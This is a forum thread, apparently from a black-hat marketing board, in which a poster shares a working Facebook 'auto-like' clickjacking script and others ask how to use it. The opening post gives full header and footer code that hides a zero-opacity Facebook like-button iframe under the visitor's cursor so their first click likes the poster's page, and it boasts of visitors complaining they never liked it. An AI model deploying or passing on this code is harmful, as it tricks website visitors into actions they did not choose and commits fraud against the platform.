[Merry Christmas] [GET] Working Facebook Auto-Like Script (Bypass Confirmation)

KraftyKyle

Elite Member
Joined
Aug 13, 2008
Messages
3,669
Reaction score
6,911
Someone mentioned they wanted to purchase a Facebook auto-like script. I realized one I had been using is actually working great. This, to my knowledge, bypasses the confirmation page. Now please keep in mind that it does not count EVERY visit as a like, but it does steadily increase the likes on your Facebook page. What it does is have the first click someone makes on your site, like your Facebook page. I put the code on one of my wordpress blogs about a week ago and have since seen an added 750+ likes to the page. I just checked today and many people were posting "I never liked this page why is it showing up on my newsfeed!" and comments like (just so you all know). It is not a script of my own, but I'm not really sure where I got it from. I just saw it on my computer one day. It's incredibly simple. Just replace the YOURFACBOOKPAGEURL in the footer code with your fan page url. Then put the header code in your header.php file or wherever your header is and then put the footer code in your footer.php file or wherever your footer is. enjoy!


header code
Code:
<script src="http://code.jquery.com/jquery-1.4.2.min.js" type="text/javascript"></script>
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 50);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" )
    {
        clearInterval(interval);
        iflag=1;
    }    
}
        
</script>

footer code
Code:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">

         <iframe src="http://www.facebook.com/plugins/like.php?href=YOURFACEBOOKPAGEURL&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
        
      </div>    
    
      <script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event)
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    }
    else
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
    }

    </script>


MERRY CHRISTMAS!
 
Last edited:
Gonna try it risking my FB page. :)

One question: WHat happens if someone who has already liked my page, comes to my site and clicks?
 
thanks...
going to try today with my FB page..!!
What happend If already liked my page???
 
Gonna try it risking my FB page. :)

One question: WHat happens if someone who has already liked my page, comes to my site and clicks?

thanks...
going to try today with my FB page..!!
What happend If already liked my page???

If the visitor has already liked your Facebook page, they will see your site as if the script was not even on it. (I hope that makes sense)

In other words: Essentially if the visitor has already liked your Facebook page, it will not run the script.
 
threat detected by my avast on using this script..
 
Consider the bypass patched bro,

but nice share.
 
This is my code.. Where did you get this?

Definitely not your code, though you very well could be using it as I may have even gotten it here on BHW a long time ago.

Consider the bypass patched bro,

but nice share.

Seems to be working on my site and bypassing the confirmation, though I've read they have been patched.
 
Definitely not your code, though you very well could be using it as I may have even gotten it here on BHW a long time ago.



Seems to be working on my site and bypassing the confirmation, though I've read they have been patched.



Might be working... but The Guugles and Faceuukz and the likez all have spies on here.

You never read stories of people sharing their account stats and then within days they have their accounts banned.

I lost one of my CPA acounts like that.
 
Seems to be working on my site and bypassing the confirmation, though I've read they have been patched.

750 likes in a week isn't much Kyle.. the small amount of clicks generated by your blog is just not enough to trigger the confirmation.

NOTHING in that code is there for the purpose of bypassing the confirm (any one with basic js/social plugin knowledge can instantly see that). This script is at least a year and a half old and actually predates the confirm by quite a bit. It has been posted here, on lesser bh forums, and even on stack-fucking-overflow lol.. so eRandom is either joking, or he is the joke.

Not trying to be a scrooge, just keepin it real. Merry X_MAS!
 
750 likes in a week isn't much Kyle.. the small amount of clicks generated by your blog is just not enough to trigger the confirmation.

NOTHING in that code is there for the purpose of bypassing the confirm (any one with basic js/social plugin knowledge can instantly see that). This script is at least a year and a half old and actually predates the confirm by quite a bit. It has been posted here, on lesser bh forums, and even on stack-fucking-overflow lol.. so eRandom is either joking, or he is the joke.

Not trying to be a scrooge, just keepin it real. Merry X_MAS!

Nota scrooge at all. I definitely get what you're saying. You're right. I guess since I'm using it in low numbers it doesn't trigger the confirmation.

Thought I'd post it up just in case someone wanted to take a stab at it. Merry Christmas to all. Now get off BHW, go to bed, and spend some quality time with your family tomorrow!
 
created a new page got around 10 likes ! now my account got banned ! :D lol but this script works ! :D
 
can you make it like other pages than facebook? like website page or a youtube video?
 
can you make it like other pages than facebook? like website page or a youtube video?

I'm not sure what you mean by "website page", but no this will not like a youtube video or do anything besides like your facebook page. However the Facebook page can be for the website the code is on so technically you could have people liking your "website page".
 
Back
Top